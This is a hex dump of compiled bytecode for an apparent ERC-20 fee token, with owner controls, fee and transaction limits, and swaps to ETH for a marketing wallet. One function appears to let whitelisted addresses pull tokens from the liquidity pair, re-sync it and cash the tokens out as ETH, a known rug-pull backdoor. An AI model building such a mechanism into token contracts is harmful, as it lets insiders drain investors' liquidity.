fffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166116f357600080fd5b6000611720600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b905060018311801561173d575060648161173a919061423d565b83105b61177c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611773906143ec565b60405180910390fd5b6117858361331d565b61178e846133ed565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16476040516117d69061443d565b60006040518083038185875af1925050503d8060008114611813576040519150601f19603f3d011682016040523d82523d6000602084013e611818565b606091505b50509050809250505092915050565b61182f6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146118be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b5906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff1615151461192f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119269061449e565b60405180910390fd5b6000600f60016101000a81548160ff021916908315150217905550611952613630565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516119909190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b6060600480546119ff90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054611a2b90614142565b8015611a785780601f10611a4d57610100808354040283529160200191611a78565b820191906000526020600020905b815481529060010190602001808311611a5b57829003601f168201915b5050505050905090565b611a8a6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611b19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b10906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba090614530565b60405180910390fd5b611bb3828261364d565b5050565b60135481565b601a5481565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461199a565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261199a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b613368600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061334c6110a4565b600a6133589190614ecc565b8461336391906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156133d257600080fd5b505af11580156133e6573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff81111561340a57613409614f17565b5b6040519080825280602002602001820160405280156134385781602001602082028036833780820191505090505b50905030816000815181106134505761344f614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156134f7573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061351b9190614f8a565b8160018151811061352f5761352e614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061359630600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016135fa9594939291906150b0565b600060405180830381600087803b15801561361457600080fd5b505af1158015613628573d6000803e3d6000fd5b505050505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816133ed565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061443d565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006143d6600f83613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b600081905092915050565b50565b600061442760008361440c565b915061443282614417565b600082019050919050565b60006144488261441a565b9150819050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b6000614488600483613c6c565b915061449382614452565b602082019050919050565b600060208201905081810360008301526144b78161447b565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b600061451a603983613c6c565b9150614525826144be565b604082019050919050565b600060208201905081810360008301526145498161450d565b9050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a4a602583613c6c565b9150614a55826149ee565b604082019050919050565b60006020820190508181036000830152614a7981614a3d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614adc602383613c6c565b9150614ae782614a80565b604082019050919050565b60006020820190508181036000830152614b0b81614acf565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b48601683613c6c565b9150614b5382614b12565b602082019050919050565b60006020820190508181036000830152614b7781614b3b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614bda603583613c6c565b9150614be582614b7e565b604082019050919050565b60006020820190508181036000830152614c0981614bcd565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c6c603683613c6c565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b6000614cad82613d76565b9150614cb883613d76565b925082614cc857614cc76141df565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d2f602483613c6c565b9150614d3a82614cd3565b604082019050919050565b60006020820190508181036000830152614d5e81614d22565b9050919050565b6000614d7082613d76565b9150614d7b83613d76565b9250828203905081811115614d9357614d9261420e565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115614df057808604811115614dcc57614dcb61420e565b5b6001851615614ddb5780820291505b8081029050614de985614d99565b9450614db0565b94509492505050565b600082614e095760019050614ec5565b81614e175760009050614ec5565b8160018114614e2d5760028114614e3757614e66565b6001915050614ec5565b60ff841115614e4957614e4861420e565b5b8360020a915084821115614e6057614e5f61420e565b5b50614ec5565b5060208310610133831016604e8410600b8410161715614e9b5782820a905083811115614e9657614e9561420e565b5b614ec5565b614ea88484846001614da6565b92509050818404811115614ebf57614ebe61420e565b5b81810290505b9392505050565b6000614ed782613d76565b9150614ee283613f73565b9250614f0f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614df9565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614f8481613d4a565b92915050565b600060208284031215614fa057614f9f613d13565b5b6000614fae84828501614f75565b91505092915050565b6000819050919050565b6000614fdc614fd7614fd284614fb7565b613e4f565b613d76565b9050919050565b614fec81614fc1565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61502781613d38565b82525050565b6000615039838361501e565b60208301905092915050565b6000602082019050919050565b600061505d82614ff2565b6150678185614ffd565b93506150728361500e565b8060005b838110156150a357815161508a888261502d565b975061509583615045565b925050600181019050615076565b5085935050505092915050565b600060a0820190506150c56000830188613ec9565b6150d26020830187614fe3565b81810360408301526150e48186615052565b90506150f36060830185613faa565b6151006080830184613ec9565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615166602183613c6c565b91506151718261510a565b604082019050919050565b6000602082019050818103600083015261519581615159565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220f37e382cfe66a4f3641a0a5f1cefb02a41cb9b4d8949c38ad9808bb64c03a79f64736f6c63430008100033

Deployed Bytecode

